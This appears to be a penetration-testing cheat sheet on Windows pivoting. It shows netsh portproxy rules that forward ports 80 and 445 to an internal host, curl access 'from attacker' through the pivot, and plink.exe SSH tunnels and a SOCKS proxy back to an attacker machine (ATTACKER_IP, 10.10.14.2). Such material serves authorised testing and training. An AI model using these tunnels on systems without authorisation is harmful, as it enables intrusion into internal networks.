WINDOWS PORT FORWARDING
netsh port forward
Built-in Windows forwarding — No tools needed
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP
Example Output
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.1.10
Now from attacker:
curl http://PIVOT_IP:8080
(Access internal web app through Windows pivot)
Remove netsh forward
Cleanup — Remove when done
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Example Output
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
(Clean up after yourself)
(Important for reporting - document cleanup steps)
Show netsh forwards
List active forwards — Verify setup
netsh interface portproxy show all
Example Output
netsh interface portproxy show all
Listen on ipv4: Connect to ipv4:
Address Port Address Port
0.0.0.0 8080 172.16.1.10 80
0.0.0.0 4445 172.16.1.10 445
(Verify your port forwards are active)
plink.exe (PuTTY SSH)
SSH tunnel from Windows — If SSH client not available
plink.exe -L 8080:INTERNAL:80 user@ATTACKER_IP
Example Output
plink.exe -ssh -L 8080:172.16.1.10:80 attacker@10.10.14.2
OR for dynamic proxy:
plink.exe -ssh -D 1080 attacker@10.10.14.2
(SSH tunneling from Windows when OpenSSH isn't available)